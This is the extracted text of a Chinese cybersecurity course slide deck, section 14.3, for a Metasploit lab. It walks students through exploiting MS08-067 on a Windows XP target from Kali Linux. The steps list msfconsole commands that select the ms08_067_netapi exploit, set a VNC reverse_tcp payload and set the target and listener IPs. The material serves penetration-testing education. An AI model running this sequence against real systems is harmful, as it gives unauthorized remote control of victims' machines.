《网络空间安全技术实践教程》课件14.3课件.pptxVIP

第四篇渗透攻击测试实验篇第十四章漏洞利用实验14.3Metasploit攻击实验网络空间安全技术实践教程1

14.3Metasploit攻击实验实验目的： 熟练掌握Metasploit渗透测试框架的使用，能使用Metasploit独立完成一次漏洞利用过程。网络空间安全技术实践教程2

14.3Metasploit攻击实验实验原理： Metasploit是由Rapid7公司开发的功能强大的开源渗透测试框架。它提供了优秀的模块化框架和底层基础库支持，灵活的插件机制和命令行批处理文件机制，集成了Nmap，Nessus，OpenVAS，SET等优秀的渗透测试工具。此外，还可以根据需求自行编写扩展脚本进行个性化定制。网络空间安全技术实践教程3

14.3Metasploit攻击实验实验原理： 网络空间安全技术实践教程4

14.3Metasploit攻击实验实验要点说明：（实验难点说明）Metasploit渗透测试框架的使用网络空间安全技术实践教程5

14.3Metasploit攻击实验实验准备：（实验环境，实验先有知识技术说明）KaliLinux有MS08-067漏洞的WindowsXP（靶机）网络空间安全技术实践教程6

14.3Metasploit攻击实验实验步骤：（1）根据扫描阶段搜集到的信息，选取漏洞进行利用。以WindowsXP系统的MS08-067漏洞为例： 网络空间安全技术实践教程7

14.3Metasploit攻击实验实验步骤：（2）终端输入“msfconsole”打开MSF的命令行交互界面。网络空间安全技术实践教程8

14.3Metasploit攻击实验实验步骤：（3）搜索漏洞攻击程序： msfsearchms08-067网络空间安全技术实践教程9

14.3Metasploit攻击实验实验步骤：（4）选择合适的漏洞攻击程序：msfuseexploit/windows/smb/ms08_067_netapi网络空间安全技术实践教程10

14.3Metasploit攻击实验实验步骤：（5）显示可用的攻击载荷： msfshowpayloads网络空间安全技术实践教程11

14.3Metasploit攻击实验实验步骤：（6）选择攻击载荷：msfsetpayloadwindows/vncinject/reverse_tcp网络空间安全技术实践教程12

14.3Metasploit攻击实验实验步骤：（7）查看对目标进行漏洞攻击之前要设置的选项： msfshowoptions网络空间安全技术实践教程13

14.3Metasploit攻击实验实验步骤：（8）对选项进行设置：msfsetRHOST192.168.52.129（设置攻击目标IP）msfsetLHOST192.168.52.133（设置监听者IP）网络空间安全技术实践教程14

14.3Metasploit攻击实验实验步骤：（9）使用“exploit”或“run”命令，对目标发动漏洞攻击。网络空间安全技术实践教程15攻击成功

14.3Metasploit攻击实验实验要求：熟练掌握Metasploit漏洞利用的流程，在完成上述步骤后，进一步熟悉Metasploit各个功能模块的作用及使用网络空间安全技术实践教程16

14.3Metasploit攻击实验实验扩展要求：尝试熟练使用Metasploit的各个功能模块，完成对Windows和Linux系统一些常见漏洞的利用过程学习自动化漏洞扫描和利用工具Armitage的使用网络空间安全技术实践教程17

14.3Metasploit攻击实验实验视频：网络空间安全技术实践教程18